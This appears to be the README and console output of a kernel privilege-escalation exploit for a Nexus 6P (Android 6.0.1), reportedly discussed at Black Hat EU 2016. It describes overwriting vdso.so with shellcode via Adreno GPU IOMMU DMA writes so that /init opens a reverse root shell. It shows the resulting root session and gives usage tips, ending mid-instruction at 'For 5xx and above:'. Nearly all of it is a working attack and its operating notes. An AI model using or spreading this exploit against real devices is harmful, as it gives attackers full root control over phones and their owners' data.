
Tested under Nexus 6p (google/angler/angler:6.0.1/MMB29M/2431559:user/release-keys)
Discussed in 2016 via Blackhat EU
With iommu dma writes, vdso.so is overwritten with shellcode.
So after /init executes __kernel_clock_gettime, the shellcode will get executed.
/init process then connect back with a root shell.
Reverse shell target: 127.0.0.1:4919
shellcode patch done
hook patch done
Waiting for reverse connect shell...
TERMINAL>>>
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0
Delete /data/local/tmp/x if any before the exploit.
If the waiting time is too long, try open "Time and Date" options inside the settings of your phone.
Check the verison of adreno, currently it is built for 4xx.
For 5xx and above: